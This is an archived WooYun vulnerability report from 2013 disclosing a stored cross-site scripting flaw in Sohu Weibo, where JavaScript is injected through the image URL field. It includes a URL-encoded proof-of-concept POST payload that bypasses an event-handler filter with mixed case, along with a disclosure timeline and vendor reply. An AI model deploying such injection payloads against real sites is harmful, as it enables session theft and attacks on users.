sohu微博主页存储型跨站 | wooyun-2013-017482

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2013-017482

漏洞标题：

sohu微博主页存储型跨站

漏洞详情

披露状态：

2013-01-19：细节已通知厂商并且等待厂商处理中
2013-01-21：厂商已经确认，细节仅向厂商公开
2013-01-31：细节向核心白帽子及相关领域专家公开
2013-02-10：细节向普通白帽子公开
2013-02-20：细节向实习白帽子公开
2013-03-05：细节向公众公开

简要描述：

sohu微薄内容可插入js code。。。后果都懂的
熬夜挖洞而已，要啥生日礼物！要啥生日礼物！

详细说明：

发微薄时，图片url内容混入js code
虽有防御：onerror->noerror script —> tpircs ....
不过难不倒我们，测试代码如下：

msg=%u5206%u4EAB%u56FE%u7247&pics=%5B%7B%22url%22%3A'http%3A%2F%2Fs3.t.itc.cn%2Fmblog%2Fpic%2F20131_17_11%2Fs_qpis9992586950.jpg%22+oNloaD%3Dalert(%22leadurlife%22)%3E%3Cx+a%3D%22a+'%2C%22extraData%22%3A%7B%22smallest%22%3A%7B%22w%22%3A119%2C+%22h%22%3A48%2C+%22size%22%3A4002%7D%2C%22small%22%3A%7B%22w%22%3A160%2C+%22h%22%3A64%2C+%22size%22%3A5935%7D%2C%22middle%22%3A%7B%22w%22%3A207%2C+%22h%22%3A83%2C+%22size%22%3A8736%7D%2C%22big%22%3A%7B%22w%22%3A207%2C+%22h%22%3A83%2C+%22size%22%3A8736%7D%7D%7D%5D&type=1303338

漏洞证明：

修复方案：

对url地址进行过滤、编码

版权声明：转载请注明来源 LeadUrLife@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2013-01-21 10:31

厂商回复：

感谢对搜狐安全的关注

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 LeadUrLife@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 LeadUrLife@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞